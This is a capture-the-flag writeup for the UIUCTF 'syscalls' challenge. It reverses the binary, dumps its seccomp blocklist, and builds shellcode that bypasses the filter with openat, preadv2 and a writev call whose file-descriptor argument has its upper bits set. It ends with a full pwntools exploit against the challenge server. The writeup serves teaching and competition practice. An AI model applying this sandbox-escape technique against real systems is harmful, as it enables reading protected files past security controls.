uiuctf - syscalls

Welcome to my writeup for the UIUCTF challenge syscalls. This was an exceptional learning experience for me. To be frank, I spent more time on this than I would like to admit and I barely managed to solve it in time (less than 1 hour before the end of the CTF at 4 AM 😅). In this writeup (more of a walkthrough), I will explain my approach, mistakes, findings, and how I managed to solve it in the end. I will also try my best to explain concepts related to binaries in general and binary exploitation in particular.

Note: informational sections are marked with XTRA:

.init

The challenge description is:

Author: Nikhil

You can't escape this fortress of security.

`ncat --ssl syscalls.chal.uiuc.tf 1337`

We are also given two files: syscalls which is the target binary and also a Dockerfile which I ignored as usual because I'm too excited to start exploring the binary (thankfully it wasn't required this time 😂).

Running file on the binary we get the following:

syscalls: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=19b78a52059d384f1b4def02d5838b625773369d, for GNU/Linux 3.2.0, stripped

So it's an Executable and Linkable Format (ELF) file, i.e. an executable for Linux. We also see that it's 64-bit and stripped, meaning symbols such as main are removed. That's not a big deal since there aren't many functions anyway, so it's easy to keep track of addresses.

Then we run checksec to get an idea of the security mechanisms in place for the binary:

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX unknown - GNU_STACK missing
PIE:      PIE enabled
Stack:    Executable
RWX:      Has RWX segments

We see it is a Position-Independent Executable (PIE), which means the program can be loaded at different locations in memory (in the virtual address space). This makes it harder to jump around in the binary, as we have to leak the base address of the binary first. You can read more about PIE here, but we won't have to worry about it in this challenge. The second thing we notice is that the stack is executable 🤨, which means we can run shellcode on the stack directly without having to use techniques like ROP.

Understanding the Program

Before jumping into Ghidra and decompiling the assembly instructions, it's always a good habit to start by running the program and interacting with it as this helps give a general overview which can help later on when reverse engineering.

Running the program we get the following output and then we are prompted for input:

>>> ./syscalls
The flag is in a file named flag.txt located in the same directory as this binary. That's all the information I can give you.

By entering a simple input we immediately get a segfault

>>> AAAABBBBCCCC
Segmentation fault

Trying again with a single character we also get an Illegal instruction which is weird, where are these instructions coming from?

>>> ./syscalls
The flag is in a file named flag.txt located in the same directory as this binary. That's all the information I can give you.
>>> a
Illegal instruction

By running dmesg, which is a utility that allows us to view the kernel's messages and errors

[125907.062999] RSP: 002b:00007fffffffdf38 EFLAGS: 00010202
[125907.063005] RAX: 00007fffffffdf70 RBX: 0000000000000000 RCX: 00007ffff7ead381
[125907.063009] RDX: 0000000000000000 RSI: 0000000000000002 RDI: 00007fffffffdf70
[125907.063012] RBP: 00007fffffffdf60 R08: 0000000000000000 R09: 0000000000000000
[125907.063015] R10: 00007ffff7ead381 R11: 0000000000000246 R12: 00007fffffffe148
[125907.063019] R13: 00005555555551c9 R14: 0000555555557da0 R15: 00007ffff7ffd040
[125907.063022] FS:  00007ffff7d84740 GS:  0000000000000000
[125946.099431] syscalls[207338]: segfault at 0 ip 00007fffffffdf70 sp 00007fffffffdf38 error 6

we see that the instruction pointer (ip) was set to 0x00007fffffffdf70 when the segfault happens which tells us that we started executing instructions on the stack (probably our buffer) which obviously failed since the data there was not valid instructions.

Enough guessing and let's dive into Ghidra 🐲

Static Analysis

After creating a project, loading the binary, and running the default analysis, we see the entry function, which passes main as the first argument to __libc_start_main

so after renaming and jumping to it we see the decompiled main function:

In red is the relevant part of the code, while the blue is typical initializations and checks. We see there is a buffer of size 184 which is passed to the first and third functions.

First Function

Logically, the next step is to start dissecting the three functions. Note: from here on out I will rename variables as we go to gradually add semantic meaning to the code and get it closer to the original source code.

The first function prints the hint, and then reads 176 bytes from STDIN into the input buffer. Given that we are reading 176 bytes into a 184-byte buffer, we can be sure this is not a buffer overflow situation.

Second Function

Moving on:

int second_func_prctl(void)

{
  int iVar1;
  long in_FS_OFFSET;
  undefined2 local_e8 [4];
  undefined8 *local_e0;
  undefined8 local_d8;
  undefined8 local_d0;
  undefined8 local_c8;
  undefined8 local_c0;
  undefined8 local_b8;
  undefined8 local_b0;
  undefined8 local_a8;
  undefined8 local_a0;
  undefined8 local_98;
  undefined8 local_90;
  undefined8 local_88;
  undefined8 local_80;
  undefined8 local_78;
  undefined8 local_70;
  undefined8 local_68;
  undefined8 local_60;
  undefined8 local_58;
  undefined8 local_50;
  undefined8 local_48;
  undefined8 local_40;
  undefined8 local_38;
  undefined8 local_30;
  undefined8 local_28;
  undefined8 local_20;
  undefined8 local_18;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_d8 = 0x400000020;
  local_d0 = 0xc000003e16000015;
  local_c8 = 0x20;
  local_c0 = 0x4000000001000035;
  local_b8 = 0xffffffff13000015;
  local_b0 = 0x120015;
  local_a8 = 0x100110015;
  local_a0 = 0x200100015;
  local_98 = 0x11000f0015;
  local_90 = 0x13000e0015;
  local_88 = 0x28000d0015;
  local_80 = 0x39000c0015;
  local_78 = 0x3b000b0015;
  local_70 = 0x113000a0015;
  local_68 = 0x12700090015;
  local_60 = 0x12800080015;
  local_58 = 0x14200070015;
  local_50 = 0x1405000015;
  local_48 = 0x1400000020;
  local_40 = 0x30025;
  local_38 = 0x3000015;
  local_30 = 0x1000000020;
  local_28 = 0x3e801000025;
  local_20 = 0x7fff000000000006;
  local_18 = 6;
  local_e0 = &local_d8;
  local_e8[0] = 0x19;
  prctl(38,1,0,0,0);
  iVar1 = prctl(22,2,local_e8);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return iVar1;
}

Honestly the decompilation looks daunting but it's because Ghidra has not identified the struct being used and instead split it up into 8-byte chunks on the stack but we will get back to that later. For now, we identify two important function calls using the prctl() function which is a wrapper for the prctl syscall

Third function

The third function does as we suspected, it runs the buffer as code (free shellcode).

XTRA: System Calls

Wikipedia defines system calls as:

In computing, a system call (commonly abbreviated to syscall) is the programmatic way in which a computer program requests a service from the operating system on which it is executed. This may include hardware-related services (for example, accessing a hard disk drive or accessing the device's camera), creation and execution of new processes, and communication with integral kernel services such as process scheduling. System calls provide an essential interface between a process and the operating system.

Basically, syscalls are a way for the program to safely interact with various physical devices (e.g. hard drive for reading/writing files), services, and processes. A list of all linux syscalls can be found here. Using syscalls is very similar to calling functions: we place the arguments in their respective registers, put the syscall number in rax, then invoke it using the syscall instruction.

Before jumping into an example let's briefly explain file descriptors as well as they will come in handy later

File Descriptors

File descriptors (FDs) are identifiers for files, pipes, or network sockets. Using this ID, a process can tell the OS which file it is referring to. FDs can be obtained in multiple ways, one of which is the open syscall, which takes the path name of the file as one of its arguments.
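To make this concrete, here is a minimal Python sketch of obtaining and using a file descriptor. The temporary directory and the placeholder file contents are assumptions made for illustration only; they are not part of the challenge.

```python
import os
import tempfile

# Create a throwaway file so the example is self-contained (placeholder content).
with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "flag.txt")
    with open(path, "wb") as f:
        f.write(b"not_the_real_flag\n")

    fd = os.open(path, os.O_RDONLY)  # thin wrapper around the OS open call; returns an integer FD
    data = os.read(fd, 64)           # the FD is all the OS needs to identify the file
    os.close(fd)

print(fd, data)
```

The value of fd is just a small non-negative integer; 0, 1, and 2 are conventionally STDIN, STDOUT, and STDERR.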

example

Back to our example, our goal is to write the contents of a file (for which we have already obtained a file descriptor) to STDOUT (to the terminal). We are going to use the sendfile syscall with the following signature

 #include <sys/sendfile.h>

ssize_t sendfile(int out_fd, int in_fd, off_t *_Nullable offset,
				size_t count);

// out_fd    -> rdi
// in_fd     -> rsi
// offset    -> rdx
// count     -> r10

Based on this we can construct the shellcode to print the file contents to terminal

mov rdi, 1        ; STDOUT (destination)
mov rsi, rax      ; assuming FD was in rax (source)
mov rdx, 0        ; print from start of file
mov r10d, 0x500   ; any size >= actual file size will work
mov rax, 40       ; syscall number
syscall
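The register convention used above can be sketched as a small Python helper that lays out the arguments in order. The helper name syscall_asm is hypothetical and only generates text; it is meant as an illustration of the x86-64 Linux convention (rdi, rsi, rdx, r10, r8, r9 for arguments, rax for the syscall number), not as a replacement for pwntools.

```python
# Argument registers for the x86-64 Linux syscall convention, in order.
ARG_REGS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")

def syscall_asm(number, *args):
    """Return assembly text that loads the arguments and invokes the syscall."""
    if len(args) > len(ARG_REGS):
        raise ValueError("a syscall takes at most 6 arguments")
    lines = [f"mov {reg}, {arg}" for reg, arg in zip(ARG_REGS, args)]
    lines.append(f"mov rax, {number}")  # syscall number goes last so rax can still be used as a source
    lines.append("syscall")
    return "\n".join(lines)

# sendfile(out_fd=1, in_fd=<value in rax>, offset=0, count=0x500), syscall number 40
sendfile_asm = syscall_asm(40, 1, "rax", 0, 0x500)
print(sendfile_asm)
```

Loading rax last matters here because the source FD is assumed to still be sitting in rax when the snippet starts.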

Second Function Continued

prctl, short for process control, allows the program to control characteristics of its own process (and child processes). The first argument specifies the operation, which is defined in <linux/prctl.h> (link). In the first call, 38 maps to PR_SET_NO_NEW_PRIVS, which prohibits the process from obtaining new privileges. We can skip this and focus on the second call to prctl with option 22, PR_SET_SECCOMP, which is used to set SECure COMPuting options. The second argument, 2, is SECCOMP_MODE_FILTER, which is defined in seccomp.h. The third argument is a pointer to a struct of type struct sock_fprog. By obtaining the SECCOMP filter we would be able to determine which syscalls are allowed and which conditions are placed on their arguments. I gave up on trying to extract the filter from the Ghidra decompilation as it seemed unreliable and instead resorted to dynamic analysis.
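In hindsight, the 8-byte constants in the decompilation can be decoded by hand. The sketch below assumes each constant is one little-endian struct sock_filter (a 16-bit code, 8-bit jt, 8-bit jf, and 32-bit k), and that local_e8[0] = 0x19 is the len field of the sock_fprog (25 instructions). The list is copied from local_d8 through local_18 in the listing above; the helper name decode is hypothetical.

```python
import struct

# local_d8 .. local_18 from the Ghidra decompilation, in stack order.
GHIDRA_QWORDS = [
    0x400000020, 0xc000003e16000015, 0x20, 0x4000000001000035,
    0xffffffff13000015, 0x120015, 0x100110015, 0x200100015,
    0x11000f0015, 0x13000e0015, 0x28000d0015, 0x39000c0015,
    0x3b000b0015, 0x113000a0015, 0x12700090015, 0x12800080015,
    0x14200070015, 0x1405000015, 0x1400000020, 0x30025,
    0x3000015, 0x1000000020, 0x3e801000025, 0x7fff000000000006, 6,
]

def decode(qword):
    """Split one 8-byte constant into (code, jt, jf, k)."""
    return struct.unpack("<HBBI", struct.pack("<Q", qword))

for index, qword in enumerate(GHIDRA_QWORDS):
    code, jt, jf, k = decode(qword)
    print(f"{index:04d}: 0x{code:02x} 0x{jt:02x} 0x{jf:02x} 0x{k:08x}")
```

The first line printed is `0000: 0x20 0x00 0x00 0x00000004`, and the raw columns can be compared one by one against the output of a dedicated seccomp tool.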

Dynamic Analysis

Dumping the Filter from Memory

Pitfall: The Slow Way of Doing Things

Instead of looking for a tool to extract the SECCOMP filter automatically from the running process (spoiler alert: IT EXISTS!), I instead opted for the manual way: extracting the filter by hand from memory. I made the mistake of relying on Ghidra's offsets for the variables which turned out to be inconsistent with the disassembled instructions.

When I finally got the correct address of the filter in memory using strace (which prints the filter pointer stored in the struct), I was faced with the task of decoding it.

>>> strace ./syscalls
prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)  = 0
prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, {len=25, filter=0x7fffffffde80}) = 0

At this point I started looking for a tool to decode the filter bytes I extracted from memory. The filters are written in the Berkeley Packet Filter (BPF) format, which is used for writing filters for many purposes but was originally made for network packets. I stumbled upon seccomp-tools, which offers a suite of tools for reading, dumping, and decoding BPF filters used with SECCOMP.

XTRA: Filter struct description from linux docs

Using the Correct Tool for the Job

By running seccomp-tools dump -c ./syscalls, I was able to get the decoded SECCOMP filters in a well-formatted style without having to worry about dumping the filters by hand.

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x16 0xc000003e  if (A != ARCH_X86_64) goto 0024
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x13 0xffffffff  if (A != 0xffffffff) goto 0024
 0005: 0x15 0x12 0x00 0x00000000  if (A == read) goto 0024
 0006: 0x15 0x11 0x00 0x00000001  if (A == write) goto 0024
 0007: 0x15 0x10 0x00 0x00000002  if (A == open) goto 0024
 0008: 0x15 0x0f 0x00 0x00000011  if (A == pread64) goto 0024
 0009: 0x15 0x0e 0x00 0x00000013  if (A == readv) goto 0024
 0010: 0x15 0x0d 0x00 0x00000028  if (A == sendfile) goto 0024
 0011: 0x15 0x0c 0x00 0x00000039  if (A == fork) goto 0024
 0012: 0x15 0x0b 0x00 0x0000003b  if (A == execve) goto 0024
 0013: 0x15 0x0a 0x00 0x00000113  if (A == splice) goto 0024
 0014: 0x15 0x09 0x00 0x00000127  if (A == preadv) goto 0024
 0015: 0x15 0x08 0x00 0x00000128  if (A == pwritev) goto 0024
 0016: 0x15 0x07 0x00 0x00000142  if (A == execveat) goto 0024
 0017: 0x15 0x00 0x05 0x00000014  if (A != writev) goto 0023
 0018: 0x20 0x00 0x00 0x00000014  A = fd >> 32 # writev(fd, vec, vlen)
 0019: 0x25 0x03 0x00 0x00000000  if (A > 0x0) goto 0023
 0020: 0x15 0x00 0x03 0x00000000  if (A != 0x0) goto 0024
 0021: 0x20 0x00 0x00 0x00000010  A = fd # writev(fd, vec, vlen)
 0022: 0x25 0x00 0x01 0x000003e8  if (A <= 0x3e8) goto 0024
 0023: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0024: 0x06 0x00 0x00 0x00000000  return KILL
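To reason about which syscalls get through, the dump above can be mirrored in a few lines of Python. This is a hand-written model of the 25 BPF instructions, not something the tool produces. The function name verdict is hypothetical, and the syscall numbers are the x86-64 values shown in the K column.

```python
AUDIT_ARCH_X86_64 = 0xC000003E
SYS_WRITEV = 20

# Syscall numbers that jump straight to KILL (lines 0005-0016).
BLOCKED = {0: "read", 1: "write", 2: "open", 17: "pread64", 19: "readv",
           40: "sendfile", 57: "fork", 59: "execve", 275: "splice",
           295: "preadv", 296: "pwritev", 322: "execveat"}

def verdict(nr, args=(), arch=AUDIT_ARCH_X86_64):
    """Return "ALLOW" or "KILL" the way the dumped filter would."""
    if arch != AUDIT_ARCH_X86_64:                # line 0001
        return "KILL"
    if nr >= 0x40000000 and nr != 0xFFFFFFFF:    # lines 0003-0004
        return "KILL"
    if nr in BLOCKED:                            # lines 0005-0016
        return "KILL"
    if nr != SYS_WRITEV:                         # line 0017
        return "ALLOW"
    fd = args[0] & 0xFFFFFFFFFFFFFFFF            # full 64-bit first argument
    if fd >> 32 > 0:                             # lines 0018-0019
        return "ALLOW"
    return "ALLOW" if fd & 0xFFFFFFFF > 0x3E8 else "KILL"  # lines 0021-0022

print(verdict(257), verdict(327))                # openat, preadv2
print(verdict(SYS_WRITEV, (1,)))                 # writev to STDOUT
print(verdict(SYS_WRITEV, (0x1000000000000001,)))
```

The important takeaway is that the filter is a blocklist: anything not listed (for example openat and preadv2) is allowed, and writev is only restricted through its fd argument.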

Pitfall: The Naive Approach

Due to my inexperience with the linux kernel, I had the brilliant idea of overwriting the SECCOMP rules by injecting my own filters which allow everything and then invoking the prctl or the seccomp syscalls to apply the changes. After hours of crafting a payload byte by byte and looking out for struct alignment and so on, I got the errno EINVAL, which according to the man page can be the result of one of the following:

EINVAL operation is unknown or is not supported ...

EINVAL The specified flags are invalid ...

EINVAL operation included BPF_ABS, but the specified offset ...

EINVAL A secure computing mode has already been set, and
	  operation differs from the existing setting.

EINVAL operation specified SECCOMP_SET_MODE_FILTER, but the
	  filter program pointed to by args was not valid or the
	  length of the filter program was zero or exceeded
	  BPF_MAXINSNS (4096) instructions.

I still wasn't sure whether it was because of the 4th or the 5th reason, so I tried another approach: SECCOMP_SET_MODE_STRICT, which sets a predefined policy that only allows read, write, _exit, and sigreturn. This was easier to test since I didn't have to provide pointers or worry about offsets or alignment. When this method also resulted in the same errno, I immediately knew it was because of the 4th reason. In hindsight this makes sense: what would be the point of a filter if it could be overwritten after being set? Once a seccomp filter is installed it cannot be removed, and any filter added later can only restrict the process further.

Bypassing the Filter

Now I knew the only way to leak the flag is to somehow bypass the filter. Reading writeups for similar challenges and SECCOMP bypass guides I realized that there are alternatives to the important syscalls (open, write, read) not included in the filter. The syscalls explained below are in the order they are executed and the stack representation rolls over the three syscalls.

open -> openat

openat opens a file relative to a directory file descriptor, which is fine as we can pass AT_FDCWD (-100, i.e. 0xFFFFFF9C as a 32-bit value) to resolve the path relative to the current working directory.

push 1
dec byte ptr [rsp]
mov rax, 0x7478742e67616c66
push rax
/* call openat */
push SYS_openat
pop rax
mov rsi, rsp
mov rdi, 0xFFFFFF9C
mov rdx, 0
syscall

/* stack repr after */
+----------------+
|      ...       |
|                |
|                |
|  0x67616c66    | ("flag.txt") / RSP
|  0x7478742e    |
|       0        |
+----------------+
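The two magic constants in the openat snippet can be checked with a short Python sketch. It only assumes little-endian byte order (as on x86-64) and that the directory FD argument is read as a signed 32-bit int.

```python
import struct

# The 8 bytes pushed onto the stack, in memory order (little-endian).
path = struct.pack("<Q", 0x7478742E67616C66)

# The directory FD argument, reinterpreted as a signed 32-bit integer.
dirfd = struct.unpack("<i", struct.pack("<I", 0xFFFFFF9C))[0]

print(path, dirfd)  # b'flag.txt' -100
```

So the qword is simply the string "flag.txt", the preceding push supplies its null terminator, and -100 is the value of AT_FDCWD on Linux.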

read -> preadv2

preadv2 is similar to read but allows for reading to multiple buffers instead of one.

ssize_t preadv2(int fd, const struct iovec *iov, int iovcnt, off_t offset, int flags);

For our case we just need one. Another point to consider is that unlike read, preadv2 does not take a pointer to a char buffer; instead it takes a pointer to an iovec struct.

struct iovec {
   void   *iov_base;  /* Starting address */
   size_t  iov_len;   /* Size of the memory pointed to by iov_base. */
};

Another point is that we are going to utilize the stack by "allocating" the buffer at a safe offset from RSP. Putting this together we get the following:

/* call preadv2 */
mov rdi, rax                ; FD returned by openat
push 70                     ; iov_len: number of bytes to read
mov rax, rsp
push rax
add dword ptr [rsp], 0x4e   ; iov_base: the buffer, at an offset from RSP
mov rsi, rsp                ; pointer to the iovec struct

xor rdx, rdx 
mov dl, 1                   ; iovcnt: number of buffers
xor r10, r10                ; offset = 0
xor r8, r8         
mov rax, 327                ; SYS_preadv2
syscall

/* stack repr after */
+----------------+
|      ...       |
|                |
|                |
|  RSP + offset  | RSP
|      70        |
|  0x67616c66    | ("flag.txt")
|  0x7478742e    |
|       0        |
+----------------+
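The push order above can be double-checked with a small Python model of the stack. The starting rsp value is hypothetical; only the relative offsets matter. Because the stack grows downwards, the value pushed last (iov_base) ends up at the lowest address, which is exactly the field order struct iovec expects.

```python
import struct

rsp = 0x7FFFFFFFDF00       # hypothetical stack pointer before the two pushes

rsp -= 8                   # push 70 -> this slot becomes iov_len
iov_len = 70
iov_base = rsp + 0x4E      # mov rax, rsp / push rax / add dword ptr [rsp], 0x4e
rsp -= 8                   # the second push -> this slot becomes iov_base

# Memory at rsp now holds the 16-byte iovec: iov_base first, then iov_len.
iovec = struct.pack("<QQ", iov_base, iov_len)
base, length = struct.unpack("<QQ", iovec)

print(hex(base - rsp), length)  # 0x56 70
```

In other words, the flag is read into a 70-byte region that starts 0x56 bytes above the final RSP.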

write -> writev

This is the signature of writev:

ssize_t writev(int fd, const struct iovec *iov, int iovcnt);

We can see that, similar to preadv2, it takes a pointer to an iovec struct, which is handy since we already have one on the stack from above. Moving on, in the filter we can see that writev is not blocked; however, there is a condition placed on the FD argument:

 0017: 0x15 0x00 0x05 0x00000014  if (A != writev) goto 0023
 0018: 0x20 0x00 0x00 0x00000014  A = fd >> 32 # writev(fd, vec, vlen)
 0019: 0x25 0x03 0x00 0x00000000  if (A > 0x0) goto 0023
 0020: 0x15 0x00 0x03 0x00000000  if (A != 0x0) goto 0024
 0021: 0x20 0x00 0x00 0x00000010  A = fd # writev(fd, vec, vlen)
 0022: 0x25 0x00 0x01 0x000003e8  if (A <= 0x3e8) goto 0024
 0023: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0024: 0x06 0x00 0x00 0x00000000  return KILL

If any of the upper 32 bits is 1, then the syscall is permitted. Furthermore, the size of FDs on a 64-bit linux system is 4 bytes (32 bits), so only the 4 lower bytes of rdi will be considered for the actual file descriptor used by the kernel. Therefore, we are free to change the upper 4 bytes to anything that bypasses the filter, so I set one of the upper bits (bit 60) to 1 to satisfy this condition.

mov rdi, 0x1000000000000001
mov rsi, rsp                  ; using our make-shift buffer as input
xor rdx, rdx      
mov dl, 1         
xor r10, r10      
mov rax, 20
syscall

+----------------+
|      ...       |
|                |
|                |
|  RSP + offset  | RSP
|      70        |
|  0x67616c66    | ("flag.txt")
|  0x7478742e    |
|       0        |
+----------------+
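The fd trick can be verified with plain integer arithmetic. This sketch simply splits the value loaded into rdi into the half the filter inspects and the half that ends up being used as the 32-bit file descriptor.

```python
fd_arg = 0x1000000000000001

upper = fd_arg >> 32           # what the filter loads as "fd >> 32"
lower = fd_arg & 0xFFFFFFFF    # what is actually used as the int fd
set_bits = [i for i in range(64) if (fd_arg >> i) & 1]

print(hex(upper), lower, set_bits)  # 0x10000000 1 [0, 60]
```

The upper half is non-zero, so the filter allows the call, while the lower half is still 1, i.e. STDOUT.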

Final Payload

With this we have all the ingredients to leak the flag. Putting it all together we get:

from pwn import *

elf = context.binary = ELF("syscalls")
if args.REMOTE:
    p = remote("syscalls.chal.uiuc.tf", 1337, ssl=True)

else:
    p = process()

shellcode = r"""    /* push b'flag.txt\x00' */
    push 1
    dec byte ptr [rsp]
    mov rax, 0x7478742e67616c66
    push rax
    /* call openat */
    push SYS_openat
    pop rax
    mov rsi, rsp
    mov rdi, 0xFFFFFF9C
    mov rdx, 0
    syscall
    /* call preadv2 */
    mov rdi, rax
    push 70
    mov rax, rsp
    push rax
    add dword ptr [rsp], 0x4e
    mov rsi, rsp
    
    xor rdx, rdx 
    mov dl, 1      
    xor r10, r10   
    xor r8, r8         
    mov rax, 327 
    syscall

    mov rdi, 0x1000000000000001
    mov rsi, rsp
    xor rdx, rdx      
    mov dl, 1         
    xor r10, r10      
    mov rax, 20
    syscall           
   """


shellcode = asm(shellcode)
p.recvuntil("you.\n".encode())
p.sendline(shellcode)
p.interactive()

FLAG: uiuctf{a532aaf9aaed1fa5906de364a1162e0833c57a0246ab9ffc} 🎊

.fini (Conclusion and Learnings)

This challenge was a difficult one for me but it is undoubtedly the one I learned from the most both in terms of technical knowledge and problem solving / mindset. I hope you enjoyed this writeup, feel free to share with me your feedback and suggestions.

Thank you 👍🏻
